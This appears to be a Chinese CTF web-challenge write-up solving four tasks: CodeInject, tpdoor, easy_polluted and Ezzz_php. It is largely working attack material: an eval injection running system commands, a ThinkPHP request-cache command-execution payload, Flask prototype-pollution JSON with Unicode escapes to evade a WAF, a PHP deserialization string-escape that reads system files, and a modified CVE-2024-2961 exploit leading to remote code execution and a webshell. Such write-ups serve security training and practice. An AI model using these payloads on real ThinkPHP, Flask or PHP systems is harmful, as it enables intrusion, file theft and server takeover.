目录

CodeInject

tpdoor 

easy_polluted

Ezzz_php 

---

CodeInject

eval里打代码注入

1=1);system("tac /0*");//

tpdoor 

可以传参isCache给../../config/route.php写入$config['request_cache_key']

打的是CheckRequestCache中间件解析的漏洞

think\middleware\CheckRequestCache 是 ThinkPHP 框架中的一个中间件，作用是检查和处理请求的缓存。它的主要功能是在用户请求时检查是否有可用的缓存，如果缓存可用则直接返回缓存内容，从而避免重新处理请求，提升性能。

通过 file_put_contents() 函数动态地修改 route.php 文件中的缓存相关配置（如缓存键、过期时间等）。var_export() 确保 $config 数组可以被转换为合法的 PHP 代码并存储到文件中，以便下次项目运行时这些新的配置可以被加载和应用 

Everything一搜都是

代审发现只要传入$key中含|即可任意代码执行

而$key是从$config['request_cache_key']中获取的

payload:

?isCache=cat%20/000*|system

执行后等一会，再次访问触发缓存机制 

easy_polluted

/可以原型链污染，改掉app.secretkey之后访问/admin拿到flag

flag.html不是正常的渲染格式，所以也要污染掉模板字符串

用json.loads可以解析 Unicode 来绕过 waf

 可以做一个小lab

import json# 包含 Unicode 编码的 JSON 字符串
json_data = '{"message": "Hello, \\u4e16\\u754c"}'  # \\u4e16\\u754c 表示 "世界"# 使用 json.loads 解析
parsed_data = json.loads(json_data)# 输出解析结果
print(parsed_data["message"])  # 输出: Hello, 世界

 

注意bp发包的时候要把响应头Set-Cookie的内容复制到Cookie里

先污染jinja2模板字符串

{"__init__" : {"__globals__" : {"app" : {"jinja_env" :{
"variable_start_string" : "[#","variable_end_string":"#]"
} }}}

{"\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f" : {"\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f" : {"\u0061\u0070\u0070" : {"\u006a\u0069\u006e\u006a\u0061\u005f\u0065\u006e\u0076" :{"\u0076\u0061\u0072\u0069\u0061\u0062\u006c\u0065\u005f\u0073\u0074\u0061\u0072\u0074\u005f\u0073\u0074\u0072\u0069\u006e\u0067":"[#","\u0076\u0061\u0072\u0069\u0061\u0062\u006c\u0065\u005f\u0065\u006e\u0064\u005f\u0073\u0074\u0072\u0069\u006e\u0067":"#]"
}}}}
}

再污染secretkey

{ "__init__" : { "__globals__" : { "app" : { "secret_key" :"Z3r4y"} } } }

{"\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f" : {"\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f" : {"\u0061\u0070\u0070" : {"\u0073\u0065\u0063\u0072\u0065\u0074\u005f\u006b\u0065\u0079" :"Z3r4y"}}}
}

最后登录将username和password写进session

username=adminer&password=Z3r4y

 带着响应头里的session访问/admin拿到flag

Ezzz_php 

substrstr($data) 的作用是从输入的字符串 $data 中，提取第一个方括号 [ 和 ] 之间的内容

考的是mb_strpos与mb_substr结合的误用

建议是先本地搭一个测试用

<?php 
highlight_file(__FILE__);
error_reporting(0);
function substrstr($data)
{$start = mb_strpos($data, "[");$end = mb_strpos($data, "]");return mb_substr($data, $start + 1, $end - 1 - $start);
}
class read_file{public $start;public $filename="/etc/passwd";public function __construct($start){$this->start=$start;}public function __destruct(){if($this->start == "gxngxngxn"){echo 'What you are reading is:'.file_get_contents($this->filename);}}
}
if(isset($_GET['start'])){$readfile = new read_file($_GET['start']);$read=isset($_GET['read'])?$_GET['read']:"I_want_to_Read_flag";if(preg_match("/\[|\]/i", $_GET['read'])){die("NONONO!!!");}$ctf = substrstr($read."[".serialize($readfile)."]");echo $ctf;
}else{echo "Start_Funny_CTF!!!";
}

 可以看到正常输入就是直接截取到[]之间的内容

 每传一个%9f就会往后'推'一个字符

 每传一个%f0后面随便跟3个字符就会往前'拉'3个字符

 

这样就可以打字符串逃逸

注意在逃逸的时候需要添加一个%9f以此来抵消[]的影响，所以要比逃逸字符串数多个%9f

比如要逃逸Z3r4y，就需要6个%9f

生成要逃逸的字符串

<?php
class read_file{public $start;public $filename;
}$a=new read_file();
$a->start='gxngxngxn';
$a->filename='/etc/hosts';echo  str_repeat('%9f',strlen(serialize($a))+1).serialize($a);
//%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9fO:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:10:"/etc/hosts";}

同时我们逃逸出的字符不能大于原来的字符数量，所以我们可以传参start来调整原字符的数量，以此逃逸出预期的字符

?start=aaaaaaaa&read=%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9fO:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:10:"/etc/hosts";}

发现可以任意文件读取了，但找不到flag

用CVE-2024-2961打LFI to RCE

CVE-2024-2961

 cnext-exploits/cnext-exploit.py at main · ambionics/cnext-exploits · GitHub

修改一下send和download即可

def send(self, path: str) -> Response:"""Sends given `path` to the HTTP server. Returns the response."""payload_file = 'O:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:' + str(len(path)) + ':"' + path + '";}'payload = "%9f" * (len(payload_file) + 1) + payload_file.replace("+","%2b")filename_len = "a" * (len(path) + 10)url = self.url+f"?start={filename_len}&read={payload}"return self.session.get(url)def download(self, path: str) -> bytes:"""Returns the contents of a remote file."""path = f"php://filter/convert.base64-encode/resource={path}"response = self.send(path)data = response.re.search(b"What you are reading is:(.*)", flags=re.S).group(1)return base64.decode(data)

 成功RCE写马

 webshell拿flag